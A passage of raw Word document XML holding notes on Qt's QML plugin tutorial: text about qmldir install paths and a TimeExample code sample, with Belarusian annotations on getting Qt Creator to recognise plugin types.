        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is important is the name of the directory that the qmldir is installed into</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the user imports our module, the QML engine uses the</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId333" w:anchor="contents-of-a-module-definition-qmldir-file" w:history="1">
        <w:r w:rsidRPr="00877F4C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>module identifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) to find the plugin, and so the directory in which it is installed must match the module identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once the project is built and installed, the new</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Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component is accessible by any QML component that imports the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// import types from the plugin</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clock</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// this class is defined in QML (imports/TimeExample/Clock.qml)</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// this class is defined in C++ (plugin.cpp)</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id</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time</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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hours</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time</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hour</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92E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    minutes</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 xml:space="preserve"> time</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">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92E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The full source code is available in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId334" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>plugins example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E2D9E" w:rsidRPr="002E2D9E" w:rsidRDefault="002E2D9E" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У мяне гэта атрымалася і </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Creator </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>бачыць тып, які я зарэгістраваў у плагіне.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2D9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> А </w:t>
      </w:r>
      <w:r w:rsidRPr="002E2D9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2D9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> дакументы, чамусьці, на бачыць…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="reference"/>
      <w:bookmarkStart w:id="408" w:name="_Toc483000618"/>
      <w:bookmarkStart w:id="409" w:name="_Toc483003635"/>
      <w:bookmarkStart w:id="410" w:name="_Toc483603971"/>
      <w:bookmarkStart w:id="411" w:name="_Toc483605191"/>
      <w:bookmarkEnd w:id="407"/>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
      <w:bookmarkEnd w:id="409"/>
      <w:bookmarkEnd w:id="410"/>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId335" w:history="1">
        <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Writing QML Extensions with C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- contains a chapter on creating QML plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId336" w:history="1">
        <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining QML Types from C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- information about registering C++ types into the runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId337" w:history="1">
        <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>How to Create Qt Plugins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00192E15" w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- information about Qt plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRDefault="00192E15" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B30B71" w:rsidRPr="00B30B71" w:rsidRDefault="00B30B71" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B30B71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Каб </w:t>
      </w:r>
      <w:r w:rsidRPr="00B30B71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Creator </w:t>
      </w:r>
      <w:r w:rsidRPr="00B30B71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">нешта бачыў, можна рабіць, як у гэтым прыкладзе: </w:t>
      </w:r>
      <w:hyperlink r:id="rId338" w:history="1">
        <w:r w:rsidRPr="00B30B71">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
